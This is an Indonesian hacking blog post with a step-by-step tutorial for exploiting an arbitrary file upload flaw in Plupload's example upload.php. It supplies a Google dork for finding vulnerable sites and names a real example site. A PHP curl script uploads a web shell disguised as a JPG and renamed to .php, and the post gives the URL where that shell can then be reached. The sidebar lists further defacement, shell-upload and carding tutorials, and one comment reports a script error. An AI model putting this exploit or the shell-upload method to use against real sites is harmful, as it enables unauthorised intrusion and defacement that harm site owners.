xiixhix,, Nuenomaru disini .-.
dah lagi males basa basi
TKP:
Dork ~ inurl:/plupload/examples/
Exploit ~ www.target.com/[path]/plupload/examples/upload.php
Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Contoh : http://book-shelf.jp/plupload/examples/upload.php
Ubah Format Shell Kamu jadi format shell.jpg ~ Shell punya saya ~ chaYankVica.jpg
Code PHP :
<?php
$url = "http://target.com/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@chaYankVica.jpg",
"name" => "chaYankVica.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
save dengan format php.
ganti tulisan berwarna merah sesuai nama shell kalian >.<
ganti target.com dengan web target kalian
Langkah:
install xampp
taruh uploader nya di folder C:/xampp/php
save dengan format php ya
taruh juga shell kalian yang berformat jpg di C:/xampp/php
nyalakan xampp apache klik start
buka cmd
ketikan:
cd C:/xampp/php
php plupload.php
enter dan nanti akan muncul jika done
Shell Acces : www.target.com/[path]/plupload/examples/uploads/shell.php
atau
Jadinya Seperti ini Deh ~ http://target.com/plupload/examples/uploads/chaYankVica.php
Source and thanks to: Forum INCEF
./Nuenomaru
Home
Deface
Hacking
Keamanan Website
Security Tester
Tutorial
Tutorial Plupload Arbitrary File Upload
Thursday 14 May 2015
Tutorial Plupload Arbitrary File Upload
Nuenomaru just an illusion in Cyber World
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Tutorial Plupload Arbitrary File Upload
MasterBlog TCA
5.0
stars based on
35
reviews
xiixhix,, Nuenomaru disini .-. dah lagi males basa basi TKP: Dork ~ inurl:/plupload/example s/ Exploit ~ www.target.com/[path]/plup...
Subscribe to:
Post Comments (Atom)
Sosial Media
Blog Archive
-
▼
2015
(109)
-
▼
May
(64)
- Cara mendapatkan template PowerPoint gratis dari M...
- Membuat Barcode Secara Online Mudah dan Cepat
- Cara Setting Modem TP-LINK Telkom Speedy
- Tutorial Deface Wordpress Plugins FromCraft Upload
- Tutorial Deface Wordpress Themes Qualifire File Up...
- Tutorial Deface Metode Uploadify dengan CSRF di zi...
- Tutorial Deface dengan CSRF Wordpress Themes Satoshi
- Cara Cek Kondisi Harddisk melalui Command Prompt (...
- Check Disk: Periksa dan Perbaiki Kesehatan dan Kin...
- Tutorial Hacking CCTV Online dengan Dork dari Google
- Simple Deface WordPress Village theme Arbitary Fil...
- Simple Deface OpenCart CMS dengan Teknik FCK Editor
- Tutorial Deface Website dengan Wordpress GoGreen F...
- Tutorial Upload Shell di OpenCart CMS
- RUMUS SUMMARY PERBANDINGAN
- Ciri Ciri RAM Bermasalah atau Rusak
- Cara Reset Modem TP-Link Telkom Speedy
- Cara Mengaktifkan Telnet di Windows
- FTP Server di Ubuntu Dengan ProFTPD
- Tutorial Deface dengan FTP Server Melalui CMD
- Cara melegakkan android galaxy y GT-S5360
- Tweak camera untuk galaxy y GT-S5360
- Cara Memutar Musik Lewat Terminal Console Linux
- Tutorial Deface Dengan Metode Spaw Uploads
- Tutorial Cara Mereset Password di Ubuntu Tanpa Har...
- Kumpulan Tutorial SQL Injection dari X'1n73ct
- Tutorial Eksekusi Deface dengan FCKeditor Simple
- Deface dengan Auto exploit PhpWiki
- Tutorial Deface dengan Mass Deface
- Tutorial Deface dengan Exploit com_sexycontactform...
- Penjelasan dan Cara Menggunakan Jingling Auto Visi...
- Tutorial Menghidden Folder di Windows Dengan CMD
- Cara Menambahkan Aplikasi di hp cina yang tidak me...
- Tutorial Cara Ganti Costum ROM Samsung Galaxy S Ad...
- Tutorial Carding dengan SQL Map
- WordPress Easy Comment Upload (Plugin)
- Dorking dengan BinGoo pada Linux
- cara agar mp3 di musik dan video anda tidak terdup...
- Tutorial Hack HP Symbian s60v3 dan s60v5
- Cara Memperbarui Perangkat Lunak Nokia S60 V5 Symbian
- Tutorial Konfigurasi DNS dan DHCP Server pada Linu...
- Tutorial PhUploader File Upload Vulnerable
- Tutorial Deface Web sch menggunakan FCKeditor
- Deface dengan KindEdior Remote File Upload exploit
- Tutorial Deface degan Moxiecode File Browser
- Mencari Celah Website dengan Uniscan di Kali Linux
- Cara Mengembalikan size Kapasitas Flashdisk yang B...
- Silentum Uploader Upload Vulnerability
- Tutorial Plupload Arbitrary File Upload
- Deface dengan JQuery File Upload Vulnerability
- Deface Dengan Bypass admin login jogjacamp
- Tutorial Bypass SQL Login
- Tutorial Deface dengan Exploit SchoolHos
- Tutorial Deface dengan Webdav
- Tutorial Scan Page Login Website dengan Python di CMD
- Mengatasi Low Virtual Memory pada Windows
- List Repository beberapa Distro LINUX
- Cara Patching Bug Exploit Joomla ( Com_User )
- Cara Deface Com_User Auto Exploiter dan Cara menan...
- Download Script Deface TKJ Cyber Art
- Jenis Dan Fungsi Rumus Summary Dalam Microsoft Excel
- Tutorial Membuat Bootable di Flashdisk dengan Powe...
- Mengatasi Grub rescue > _
- Tutorial root Smartphone android
-
▼
May
(64)
Paling Dibaca
-
Hallo fans .-. Nuenomaru disini. diPostingan sebelumnya Nue share Deface Website Phising dengan Hidden Uploader . Sekarang Nue akan ...
-
Hallo fans .-. Nuenomaru disini. xixixhi sebelomnya mau bilang dlu nih, karna 3 minggu bsk gw ama tmn2 TKJ Cyber Art mau melaksanakan...
-
xixihi, Nuenomaru disini .-. sesuai judul thread nue akan share sekarang :v Bug 11/12 sama uploadify , siapa tau ada yang belum tau Dork...
-
xixihi, kali ini Nuenomaru akan menjelaskan sesuai Judul thread hari ini. langsung aja step step ninja nya: Exploit : zicepanel/ziceadmi...
-
Hallo fans .-. Nuenomaru disini. xixihi,, pulang Ujian Sekolah, gue langsung liat kalender, trnyata bsk tanggal merah wkkwk. yowess, gu...
-
Hallo fans .-. Nuenomaru disini. Di postingan kali ini Nue akan Share Tutorial Exploit WordPress Anthology Themes Remote File Upload Vuln...
-
Selamat Malam fans .-. Nuenomaru disini. ciee malming, gak ngapel gengs ?? , malah sibuk nyari exploit lo gengs wkawkawk Di postingan ...
-
sampe kapan?! awkkaw Malam Fans .-. Nuenomaru disini. mumpung ini hari Minggu, dan bsk dah mulai Ujian Sekolah lg, gua sempetin bua...
-
mungkin diantara kita ada yang pernah mengalami ukuran flashdisk menjadi kecil bahkan sampai 0 KB, padahal ukuran aslinya 8 GB. penyebab be...
-
Nuenomaru sekarang akan membahas Uniscan ;) tool scanner yang sudah tersedia di Kali Linux. sebenernya di Kali Linux dan Backtrack juga ada...
Sobat TKJ Cyber Art
Status
PARTNERSHIP
TKJ Cyber Art. Powered by Blogger.
1 comments
PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /home/minoritycode/Documents/plup.php:9
Stack trace:
#0 {main}
thrown in /home/minoritycode/Documents/plup.php on line 9
dah coba di windows dan linux error nya sama gan :(
EmoticonEmoticon